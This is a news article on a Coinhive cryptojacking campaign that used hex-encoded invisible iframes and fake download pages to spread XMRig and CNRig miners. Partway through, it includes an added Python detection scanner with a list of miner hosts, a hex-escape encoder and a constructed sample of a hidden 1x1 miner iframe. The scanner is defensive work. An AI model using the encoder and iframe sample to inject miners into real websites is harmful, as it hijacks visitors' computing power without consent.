A cryptojacking operation that injects legitimate websites with secret Coinhive shortlinks was recently discovered to be part of an even larger malicious infrastructure that redirects innocent site visitors to servers that distribute both web-based and standard cryptominers.
Researchers at Malwarebytes uncovered the larger plot as they investigated hundreds of websites whose various content management systems had been injected with hexadecimal code that turned out to be 1x1 pixel iframes -- invisible to the naked eye. These iframes contained Coinhive shortlinks, a type of hyperlink that, when clicked on, can be monetized by forcing site visitors to solve a number of hashes before reaching the intended destination.
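The injection described above combines two tricks a site owner can check for: the iframe markup is stored as a run of `\xNN` hexadecimal escapes (so a plain text search for "iframe" or "cnhv" finds nothing), and the decoded frame is 1x1 pixels. The following is an added example, not code from Malwarebytes or Sucuri, of a small scanner that decodes such hex-escaped runs in a page's HTML and flags any iframe that is either tiny or points at a Coinhive shortlink host. The sample page, the `EXAMPLEKEY` path and the `hex_escape` helper that builds the sample are constructed for the demonstration; the host list is taken from the article.

```python
import re
from dataclasses import dataclass

# Runs of at least eight \xNN escapes; shorter runs are common in legitimate JS.
HEX_ESCAPE_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){8,}')
IFRAME_TAG = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE)
ATTRIBUTE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)

# Hosts named in the article as the shortlink / miner loader origins.
SUSPECT_HOSTS = ('cnhv.co', 'coinhive.com')


@dataclass
class Finding:
    src: str          # iframe destination
    width: str        # declared width (may be empty)
    height: str       # declared height (may be empty)
    tiny: bool        # 0/1 pixel frame, effectively invisible
    known_host: bool  # destination is a known shortlink host
    encoded: bool     # found only after decoding hex escapes


def decode_hex_escapes(run: str) -> str:
    """Turn a '\\x3c\\x69...' run back into the text it encodes."""
    return bytes.fromhex(run.replace('\\x', '')).decode('latin-1')


def scan_page(html: str) -> list[Finding]:
    """Return every iframe in the page that is invisible or points at a suspect host."""
    candidates = [('raw', html)]
    # Hex-decoded runs are scanned as separate text so encoded tags are caught.
    candidates += [('hex', decode_hex_escapes(m.group(0)))
                   for m in HEX_ESCAPE_RUN.finditer(html)]

    findings = []
    for origin, text in candidates:
        for tag in IFRAME_TAG.finditer(text):
            attrs = {k.lower(): v for k, v in ATTRIBUTE.findall(tag.group(0))}
            src = attrs.get('src', '')
            width = attrs.get('width', '')
            height = attrs.get('height', '')
            tiny = (width.lower().rstrip('px') in ('0', '1')
                    and height.lower().rstrip('px') in ('0', '1'))
            known_host = any(h in src.lower() for h in SUSPECT_HOSTS)
            if tiny or known_host:
                findings.append(Finding(src, width, height, tiny, known_host,
                                        encoded=(origin == 'hex')))
    return findings


# --- constructed sample input (not from the article) -----------------------

def hex_escape(text: str) -> str:
    """Encode text as \\xNN escapes, the obfuscation form the article describes."""
    return ''.join(f'\\x{b:02x}' for b in text.encode('latin-1'))


INJECTED_IFRAME = ('<iframe src="https://cnhv.co/EXAMPLEKEY" width="1" height="1" '
                   'style="display:none"></iframe>')

CONSTRUCTED_PAGE = (
    '<html><body><p>Welcome to the site</p>\n'
    # A normal, visible embed that must not be flagged.
    '<iframe src="https://www.example.com/embed/demo" width="560" height="315"></iframe>\n'
    # The injected, hex-escaped 1x1 frame written in via document.write.
    '<script>document.write("' + hex_escape(INJECTED_IFRAME) + '");</script>\n'
    '</body></html>'
)

if __name__ == '__main__':
    for f in scan_page(CONSTRUCTED_PAGE):
        print(f'{f.src}  {f.width}x{f.height}  tiny={f.tiny} '
              f'known_host={f.known_host} hex_encoded={f.encoded}')
```

Run it against a page dump or a CMS post body exported from the database; the `encoded` flag tells you whether a hit would have been missed by a plain-text grep, which is the point of the hex layer the article describes. Pages that use `document.write` with long hex runs for any reason deserve a manual look even when no iframe decodes out of them.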
Normally this process would take mere seconds, but by abusing the process in this case, the attackers can make money by having users' devices expend their precious processing power continually solving the hashes. One observed instance required over 3,712,000 solved hashes rather than the standard 1,024, lead malware intelligence analyst Jerome Segura reports in a July 3 company blog post.
Segura credits fellow cybersecurity company Sucuri with exposing this scam back earlier this year. "The miner script is not being directly loaded from your website but rather through the cnhv[.]co website," states Luke Leal, a security analyst at Sucuri, in a May 22 blog post. "It adds what could be viewed as an additional layer of ambiguity and thereby helps it evade detection as some major anti-virus/information security companies do not have it listed as suspicious yet, though many will detect it once the main script coinhive[.]min[.]js is loaded."
But Malwarebytes appears to have further blown the lid off this campaign by detecting yet another arm of this operation -- one that appears to be a malicious traffic distribution system that ultimately infects victims with either the coin miner XMRig or a miner based on CNRig, a CryptoNight CPU Monero miner for Linux machines.
"In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online," Segura writes. "In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners."
Malwarebytes made the connection after noting that the Coinhive key used in the shortlinks scheme was actively used as far back as May 7 for a separate but related redirection mechanism. This mechanism involves backdoor-compromised websites that send unwitting visitors to a malicious server that initiates another redirection, ultimately leading to the Coinhive shortlink.
Additionally, URIs (Uniform Resource Identifiers) associated with this campaign were found to contain SEO-related keywords which were dynamically used to create fake download pages and files. "We confirmed that indeed some Google or Bing searches showed us results that included the list of compromised sites that are acting as 'doorways,' usually to a traffic distribution system or redirector..." writes Segura. "In this case, the doorways are used to trick people into downloading malicious coin miners instead of the file they were looking for."
Malwarebytes found that victims are infected with the XMRig miner, a batch file that is used for persistence and actually launches the miner, and a simple .NET-based downloader. Further investigation also turned up a second coin miner in the ELF (Executable and Linkable Format) file format, based on CNRig.
The XMRig miner's public stats page listed around 500 infected machines that had participated in its mining activity. No such stats page was available for the CNRig-based miner, but Segura notes that the number of hacked servers was much higher.